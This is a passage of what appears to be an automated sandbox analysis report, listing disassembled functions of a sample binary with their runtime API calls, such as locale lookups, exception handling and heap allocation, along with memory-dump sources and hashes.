Instruction Fuzzy Hash: 6BF06D76B00204DFD714EF98E846B9D77F0FB18B25F20412AF510EB6A1C7794A408F90

Function 00147F0C Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0013FB30: GetLastError.KERNEL32(?,?,0013A53E,001565E0,0000000C), ref: 0013FB34
Part of subcall function 0013FB30: SetLastError.KERNEL32(00000000), ref: 0013FBD6

EnumSystemLocalesW.KERNEL32(00147E65,00000001,00000000,?,?,001486D0,-00000050,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 00147F43

Memory Dump Source

Source File: 00000000.00000002.1645379682.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true

Associated: 00000000.00000002.1645364830.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645400609.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.0000000000158000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645464056.000000000018D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_130000_file.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 48774d0092947fb587c4fcdf260bddac25ee6249c4b1ad44bdb7d9739d8b67f4
Instruction ID: 5c80abeaa7a02ea1fcd0cb2ce013f08db6c640f3bf94211eecaf1742d74cd1d7
Opcode Fuzzy Hash: 48774d0092947fb587c4fcdf260bddac25ee6249c4b1ad44bdb7d9739d8b67f4
Instruction Fuzzy Hash: EBF0553A30020457CB049F39C85576ABF94EFC1B14F464058EA098B6A1C7719C43C790

Function 00140615 Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,0013EDC5,?,20001004,00000000,00000002,?,?,0013E3C7), ref: 00140649

Memory Dump Source

Source File: 00000000.00000002.1645379682.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true

Associated: 00000000.00000002.1645364830.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645400609.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.0000000000158000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645464056.000000000018D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_130000_file.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 7a3686d0b615450fdf8ec2ae989971eff87b9ea9b749bc15bcacc7fa0509e436
Instruction ID: e02b91ef6bed8bf0bf368a8002471d381ec012cb1df081a6598c44854e265559
Opcode Fuzzy Hash: 7a3686d0b615450fdf8ec2ae989971eff87b9ea9b749bc15bcacc7fa0509e436
Instruction Fuzzy Hash: B7E04F35600228BBCF132F62DC05A9E3F56FF48B61F024020FE1966171CB719D70AAE5

Function 00135C45 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00005C51,001350EC), ref: 00135C4A

Memory Dump Source

Source File: 00000000.00000002.1645379682.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true

Associated: 00000000.00000002.1645364830.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645400609.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.0000000000158000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645464056.000000000018D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_130000_file.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 4bc3c5a160f28497cd181d60343b3445c59f8986c07c31731b3656dee3b98ead
Instruction ID: e3b8ea1768f0ef7d0c1e87e956413a20df6b6aa8576eb08e5ad40cfa742743d3
Opcode Fuzzy Hash: 4bc3c5a160f28497cd181d60343b3445c59f8986c07c31731b3656dee3b98ead
Instruction Fuzzy Hash:

Function 00148830 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00148830

Memory Dump Source

Source File: 00000000.00000002.1645379682.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true

Associated: 00000000.00000002.1645364830.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645400609.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.0000000000158000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645464056.000000000018D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_130000_file.jbxd

Yara matches

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: c143e7e7cf09dd6dd320e00ee63fafdb8980a988d17b6ecb84f9fd4e2cefdeab
Instruction ID: 05d021e267e060bc8ae74129a530420218afef7948f348776d2b7ec647a132f8
Opcode Fuzzy Hash: c143e7e7cf09dd6dd320e00ee63fafdb8980a988d17b6ecb84f9fd4e2cefdeab
Instruction Fuzzy Hash: FEA02238200200CF83808F3ABE0C30E3BE8BB02AC0308C028A800C2A30EB3080C08F02

Function 0014771B Relevance: .3, Instructions: 327COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1645379682.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true

Associated: 00000000.00000002.1645364830.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645400609.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.0000000000158000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645464056.000000000018D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_130000_file.jbxd

Yara matches

Similarity

API ID: ErrorLastProcess$CurrentFeatureInfoLocalePresentProcessorTerminate
String ID:
API String ID: 3471368781-0
Opcode ID: cda5e23600627f0482eb8bdeb8056bcfefa6fd71443d641753c86404e237d54d
Instruction ID: 1704153cdc8ad62478312092b903d2231172e999d6daf41ea0ac629d0dfd0962
Opcode Fuzzy Hash: cda5e23600627f0482eb8bdeb8056bcfefa6fd71443d641753c86404e237d54d
Instruction Fuzzy Hash: FAB125755047068BDB389B25CC82BB7B3A9FF54318F14492DE983C66E0EB74E981C710

Function 00140919 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1645379682.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true

Associated: 00000000.00000002.1645364830.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645400609.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.0000000000158000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645464056.000000000018D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_130000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23ebd0bd5e6436c6e2895a3075ff04c1db8902bf7fd9e8bc258d8b36fe32f176
Instruction ID: d5524b1b1a2ab0dc9b8cc6d321e8ccdd56151bbbba3383e12d7612fbf8ac6448
Opcode Fuzzy Hash: 23ebd0bd5e6436c6e2895a3075ff04c1db8902bf7fd9e8bc258d8b36fe32f176
Instruction Fuzzy Hash: DDE08633915128EBC715DBD9C50494AF3ECF749B14B110466B605D3112C370DE00C7D0

Function 0013D920 Relevance: .0, Instructions: 12COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1645379682.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true

Associated: 00000000.00000002.1645364830.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645400609.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.0000000000158000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645464056.000000000018D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_130000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d87c33899da8d58fa6654e79c7e00a8da3c0027e1c05e394fccb95485ad6873
Instruction ID: 580f0e2ef26ac5b5c949db98e6b3f01f2df616431cfd8e64be1dca0e1fa7308a
Opcode Fuzzy Hash: 0d87c33899da8d58fa6654e79c7e00a8da3c0027e1c05e394fccb95485ad6873
Instruction Fuzzy Hash: 48C08C34100A004ADF2AAD10E2713A43356A3A178AFC0288CC5460B642CF3E9C83D710

Function 00134EE0 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00134EE6
GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 00134EF4
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00134F05
GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 00134F16

Strings

GetCurrentPackageId, xrefs: 00134EEE
kernel32.dll, xrefs: 00134EE1
GetSystemTimePreciseAsFileTime, xrefs: 00134EFA
GetTempPath2W, xrefs: 00134F0B

Memory Dump Source

Source File: 00000000.00000002.1645379682.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true

Associated: 00000000.00000002.1645364830.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645400609.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.0000000000158000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645464056.000000000018D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_130000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleModule
String ID: GetCurrentPackageId$GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
API String ID: 667068680-1247241052
Opcode ID: 62f49d11fb2dd8ecdbac1b62d0952caa8c0b75cabee7a460190a0233e3bbabc1
Instruction ID: 576d4c78d4a355ca86a7f00181f0d1eb6d8a2a2b8b7a18cf9449d26d696fdded
Opcode Fuzzy Hash: 62f49d11fb2dd8ecdbac1b62d0952caa8c0b75cabee7a460190a0233e3bbabc1
Instruction Fuzzy Hash: 41E0B63AA45320ABD3009FB0EC4999A3BE4FB46B91300042AF512D3AB4D7B445898B91

Function 00138748 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 00138867
___TypeMatch.LIBVCRUNTIME ref: 00138975
_UnwindNestedFrames.LIBCMT ref: 00138AC7
CallUnexpected.LIBVCRUNTIME ref: 00138AE2

Strings

csm, xrefs: 00138785
csm, xrefs: 001387F2
csm, xrefs: 0013889E

Memory Dump Source

Source File: 00000000.00000002.1645379682.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true

Associated: 00000000.00000002.1645364830.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645400609.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.0000000000158000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645464056.000000000018D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_130000_file.jbxd

Yara matches

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2751267872-393685449
Opcode ID: bc9595bd4e57665f7d682351929f3caf27b5ff1c5e7b40a9b2ab7a49961d3921
Instruction ID: 8d6f463451ff7cf5971f49c6cb15f3bf27f32cb0dec61e1dda13006d73ff1585
Opcode Fuzzy Hash: bc9595bd4e57665f7d682351929f3caf27b5ff1c5e7b40a9b2ab7a49961d3921
Instruction Fuzzy Hash: EAB15771800309EFCF29EFA4C8819AEBBB5FF54310F14459AF8156B252DB31EA51CBA1

Function 0014B083 Relevance: 12.2, APIs: 8, Instructions: 248COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00A2FD80,00A2FD80,?,7FFFFFFF,?,0014B353,00A2FD80,00A2FD80,?,00A2FD80,?,?,?,?,00A2FD80,?), ref: 0014B129
__alloca_probe_16.LIBCMT ref: 0014B1E4
__alloca_probe_16.LIBCMT ref: 0014B273
__freea.LIBCMT ref: 0014B2BE
__freea.LIBCMT ref: 0014B2C4
__freea.LIBCMT ref: 0014B2FA
__freea.LIBCMT ref: 0014B300
__freea.LIBCMT ref: 0014B310

Memory Dump Source

Source File: 00000000.00000002.1645379682.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true

Associated: 00000000.00000002.1645364830.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645400609.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.0000000000158000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645464056.000000000018D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_130000_file.jbxd

Yara matches

Similarity

API ID: __freea$__alloca_probe_16$Info
String ID:
API String ID: 127012223-0
Opcode ID: 8fe475317eb6358cddab2f5abced078cc145a23f96f1bab73a2c6d6dd2ce3588
Instruction ID: a918d259e0f3aa3957c1ba5925e80da40724d3095db2d83bc66dc17a8203903f
Opcode Fuzzy Hash: 8fe475317eb6358cddab2f5abced078cc145a23f96f1bab73a2c6d6dd2ce3588
Instruction Fuzzy Hash: BD71F972A082059BEF219FA4DCD1FEF77B9AF59710F290055F814A72A1E775EC018790

Function 001381E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00138217
___except_validate_context_record.LIBVCRUNTIME ref: 0013821F
_ValidateLocalCookies.LIBCMT ref: 001382A8
__IsNonwritableInCurrentImage.LIBCMT ref: 001382D3
_ValidateLocalCookies.LIBCMT ref: 00138328

Strings

csm, xrefs: 001382BD

Memory Dump Source

Source File: 00000000.00000002.1645379682.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true

Associated: 00000000.00000002.1645364830.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645400609.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.0000000000158000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645464056.000000000018D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_130000_file.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: fbe18922d558a36f4f1bdf512dd68de527bed4b6df3d3236af33ab8b73c52403
Instruction ID: 18576c1bbfa0bcf49d9862017faecae59b090d84ecb9f6c37f00cfd0983f7430
Opcode Fuzzy Hash: fbe18922d558a36f4f1bdf512dd68de527bed4b6df3d3236af33ab8b73c52403
Instruction Fuzzy Hash: 1B419D34A00608EFCF10DF69C884A9EBBA5BF45324F148155F815AB3A2DB75EA46CB91

Function 00132AD0 Relevance: 10.5, APIs: 7, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00132AD7
std::_Lockit::_Lockit.LIBCPMT ref: 00132AE1
int.LIBCPMT ref: 00132AF8

Part of subcall function 0013305D: std::_Lockit::_Lockit.LIBCPMT ref: 0013306E
Part of subcall function 0013305D: std::_Lockit::~_Lockit.LIBCPMT ref: 00133088

codecvt.LIBCPMT ref: 00132B1B
std::_Facet_Register.LIBCPMT ref: 00132B32
std::_Lockit::~_Lockit.LIBCPMT ref: 00132B52
Concurrency::cancel_current_task.LIBCPMT ref: 00132B5F

Memory Dump Source

Source File: 00000000.00000002.1645379682.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true

Associated: 00000000.00000002.1645364830.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645400609.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.0000000000158000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645464056.000000000018D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_130000_file.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
String ID:
API String ID: 2133458128-0
Opcode ID: 216a5e8bfc7c3d4d8711044a177f21eab7dce833dcb47aaff7596ea9422e2ffc
Instruction ID: 3e90fa11659f5bf2d104d604ce74cf4d896406b26b59aede6ac2e582476463fd
Opcode Fuzzy Hash: 216a5e8bfc7c3d4d8711044a177f21eab7dce833dcb47aaff7596ea9422e2ffc
Instruction Fuzzy Hash: 35019272900219DBCB05FF64C8926BEB7B5BFA4720F240509F425AB2E5DF70EE058B91

Function 00132B65 Relevance: 10.5, APIs: 7, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00132B6C
std::_Lockit::_Lockit.LIBCPMT ref: 00132B76
int.LIBCPMT ref: 00132B8D

Part of subcall function 0013305D: std::_Lockit::_Lockit.LIBCPMT ref: 0013306E
Part of subcall function 0013305D: std::_Lockit::~_Lockit.LIBCPMT ref: 00133088

ctype.LIBCPMT ref: 00132BB0
std::_Facet_Register.LIBCPMT ref: 00132BC7
std::_Lockit::~_Lockit.LIBCPMT ref: 00132BE7
Concurrency::cancel_current_task.LIBCPMT ref: 00132BF4

Memory Dump Source

Source File: 00000000.00000002.1645379682.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true

Associated: 00000000.00000002.1645364830.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645400609.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.0000000000158000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645464056.000000000018D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_130000_file.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registerctype
String ID:
API String ID: 2958136301-0
Opcode ID: d0c5b929c082fd0374a6db863d30b205874db66db63bf5bd50cfa4a96b3ebeb3
Instruction ID: acbdd8cc44e146c05271b97ebf3d212a2288141485ece76be6dc6af6521c62b3
Opcode Fuzzy Hash: d0c5b929c082fd0374a6db863d30b205874db66db63bf5bd50cfa4a96b3ebeb3
Instruction Fuzzy Hash: C301B572904115DBCF09FF64D9526AEBBB5BFA4720F240009F424AB2D1DF74DE058B91

Function 001495B3 Relevance: 9.3, APIs: 6, Instructions: 298COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1645379682.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true

Associated: 00000000.00000002.1645364830.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645400609.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.0000000000158000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645464056.000000000018D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_130000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc84877b7b81ae60e477224e74ee56a85dbaf6417e78240db0aff7e62e82ea9b
Instruction ID: 76c365490d13fb72ddeafb58b6030abab976a8e8982eedefe7277e5f5f6090fb
Opcode Fuzzy Hash: fc84877b7b81ae60e477224e74ee56a85dbaf6417e78240db0aff7e62e82ea9b
Instruction Fuzzy Hash: D1B126B4E0424A9FDB15CF9DC880BAE7BB1AF96304F154159F854AB3A2C771DD42CBA0

Function 001383DA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,001383D1,001369A3,00135C95), ref: 001383E8
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 001383F6
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0013840F
SetLastError.KERNEL32(00000000,001383D1,001369A3,00135C95), ref: 00138461

Memory Dump Source

Source File: 00000000.00000002.1645379682.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true

Associated: 00000000.00000002.1645364830.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645400609.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.0000000000158000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645464056.000000000018D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_130000_file.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: c39fd09a757283d730fca791ac92abdb3976be1071c8e75e1483ee3afd38903f
Instruction ID: e326579a705d5401fdf44d81ed4b36cc72bd13f1fcda32ee05c75e1d473382e9
Opcode Fuzzy Hash: c39fd09a757283d730fca791ac92abdb3976be1071c8e75e1483ee3afd38903f
Instruction Fuzzy Hash: 9C01F27620D3129FEB2527787C8662B2A94EF22774F20032AF52496CF0FF918C809665

Function 0013D942 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,E05CB022,?,?,00000000,0014C914,000000FF,?,0013D8D2,00000002,?,0013D8A6,0013A754), ref: 0013D977
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0013D989
FreeLibrary.KERNEL32(00000000,?,?,00000000,0014C914,000000FF,?,0013D8D2,00000002,?,0013D8A6,0013A754), ref: 0013D9AB

Strings

mscoree.dll, xrefs: 0013D970
CorExitProcess, xrefs: 0013D981

Memory Dump Source

Source File: 00000000.00000002.1645379682.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true

Associated: 00000000.00000002.1645364830.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645400609.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.0000000000158000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645464056.000000000018D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_130000_file.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: d05acaee904bbb7135fb3f842ff6ca8c7c0e45f8ec7da75d1f61b52f6dd1eb02
Instruction ID: 33c10ad5e5142e45025c3222325672930c99f4747138999d01c44e2eb377b7a6
Opcode Fuzzy Hash: d05acaee904bbb7135fb3f842ff6ca8c7c0e45f8ec7da75d1f61b52f6dd1eb02
Instruction Fuzzy Hash: 6201A236A00615EFEB119F90DC45BAEBBF8FB08B15F000125F821A36E0DBB89944CB91

Function 00143C96 Relevance: 7.7, APIs: 5, Instructions: 202COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00143D1D
__alloca_probe_16.LIBCMT ref: 00143DDE
__freea.LIBCMT ref: 00143E45

Part of subcall function 001431FD: RtlAllocateHeap.NTDLL(00000000,00145916,?,?,00145916,00000220,?,00000000,?), ref: 0014322F

__freea.LIBCMT ref: 00143E5A
__freea.LIBCMT ref: 00143E6A

Memory Dump Source

Source File: 00000000.00000002.1645379682.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true

Associated: 00000000.00000002.1645364830.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645400609.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.0000000000158000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645464056.000000000018D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_130000_file.jbxd

Yara matches

Similarity

API ID: __freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 1423051803-0
Opcode ID: 06e8dc5b96d62f23a6bf0c9b9a9067038c7f3eb92d04a6ee8231fed01d160544
Instruction ID: a1aa92a0607913baccf38ad300bad767bb14505bfc88f7cab8b7a3cc8d0d44c2
Opcode Fuzzy Hash: 06e8dc5b96d62f23a6bf0c9b9a9067038c7f3eb92d04a6ee8231fed01d160544
Instruction Fuzzy Hash: 0751F372A01206AFEF259FA4CC81EFB36A9EF54B50F150129FD28E7161E731DE1087A0

Function 00134730 Relevance: 7.5, APIs: 5, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00134737
std::_Lockit::_Lockit.LIBCPMT ref: 00134742
std::_Lockit::~_Lockit.LIBCPMT ref: 001347B0

Part of subcall function 00134893: std::locale::_Locimp::_Locimp.LIBCPMT ref: 001348AB

std::locale::_Setgloballocale.LIBCPMT ref: 0013475D
_Yarn.LIBCPMT ref: 00134773

Memory Dump Source

Source File: 00000000.00000002.1645379682.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true

Associated: 00000000.00000002.1645364830.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645400609.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.0000000000158000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645464056.000000000018D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_130000_file.jbxd

Yara matches

Similarity

API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
String ID:
API String ID: 1088826258-0
Opcode ID: ce3a38ba7daec6ebfafe31ef39782c99b6c32c171e8a32d05225943d9e52e443
Instruction ID: 648567086e58257c050056c884a14eaa32a25aa1a6c1976506bef495b83451d8
